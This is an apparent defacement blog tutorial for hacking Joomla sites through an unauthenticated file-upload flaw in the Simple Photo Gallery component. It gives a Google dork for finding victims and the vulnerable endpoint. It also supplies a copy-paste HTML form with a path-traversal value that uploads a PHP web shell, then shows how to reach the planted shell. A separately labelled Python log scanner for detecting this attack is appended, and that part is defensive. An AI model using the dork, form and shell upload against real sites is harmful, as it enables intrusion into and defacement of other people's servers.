Deface Tutorial: Joomla Simple Photo Gallery Shell Upload - Defa Squad


Thursday, July 13, 2017

Let's go, guys o,O Here's the tutorial o.O, I hope you get it right away o.O Don't get it?

Dork -> inurl:com_simplephotogallery
Exploit ->  /administrator/components/com_simplephotogallery/lib/uploadFile.php
Dork first o.0 Pick a site and append the exploit path, so it becomes Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php
If the site is vulnerable, it will show text like this:

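// Excerpt from uploadFile.php (non-contiguous lines)
$fieldName = 'uploadfile';                              // name of the multipart file field
$fileTemp = $_FILES[$fieldName]['tmp_name'];            // temporary path of the uploaded file
$uploadPath = urldecode($_REQUEST["jpath"]).$fileName;  // destination built from the request's jpath value
if(! move_uploaded_file($fileTemp, $uploadPath))        // upload is moved to that request-controlled path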


Not Found? Or 404? Just move on -_-
Copy this code:
<form method="POST" action="http://familyattackcyber.blogspot.com/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Enjoy Aje">
</form>

Paste it and save it with a .html extension. Then edit the file: find http://familyattackcyber.blogspot.com and replace it with your target.
Once that's done, open it, then choose your shell and click Enjoy Aje.
The shell's name becomes random, for example -> FAC__D31saxA.php
Shell Access -> http://target.com/FAC__(RandomString).php
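
For the defending side, an added example (not from the original post or the component's code): a Python check over web server access logs that flags requests to the uploadFile.php endpoint above and later hits on a web-root .php file named like the FAC__ example. The combined log format, the sample lines and the names scan, UPLOAD_PATH, DROPPED and SAMPLE_LOG are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Endpoint named in the post, lower-cased for comparison.
UPLOAD_PATH = "/administrator/components/com_simplephotogallery/lib/uploadfile.php"
# File naming shown in the post: FAC__<random>.php in the web root.
DROPPED = re.compile(r"^/FAC__\w+\.php$", re.IGNORECASE)
# Assumption: Apache/nginx "combined" access log format.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Jul/2017:10:00:01 +0000] "GET /administrator/components/com_simplephotogallery/lib/uploadFile.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Jul/2017:10:00:40 +0000] "POST /administrator/components/com_simplephotogallery/lib/uploadFile.php HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Jul/2017:10:01:05 +0000] "GET /FAC__D31saxA.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Jul/2017:10:02:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [13/Jul/2017:10:03:00 +0000] "GET /administrator/components/com_simplephotogallery/lib/uploadFile.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return (kind, client_ip, status, path) findings in log order."""
    findings, uploaders = [], set()
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue  # line is not in the assumed format
        ip, _ts, method, url, status = m.groups()
        path = unquote(urlsplit(url).path)  # drop the query string, decode %xx
        if path.lower() == UPLOAD_PATH:
            if method == "POST" and status.startswith("2"):
                uploaders.add(ip)  # remember who uploaded, to correlate later hits
                findings.append(("upload_post", ip, status, path))
            else:
                findings.append(("probe", ip, status, path))
        elif DROPPED.match(path) and status == "200":
            kind = "dropped_php_after_upload" if ip in uploaders else "dropped_php"
            findings.append((kind, ip, status, path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

An upload_post finding from a client with no administrator session is the signal to pull the component and review the web root for unexpected .php files.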

Source: https://familyattackcyber.blogspot.co.id/2017/01/deface-joomla-simple-photo-gallery_26.html
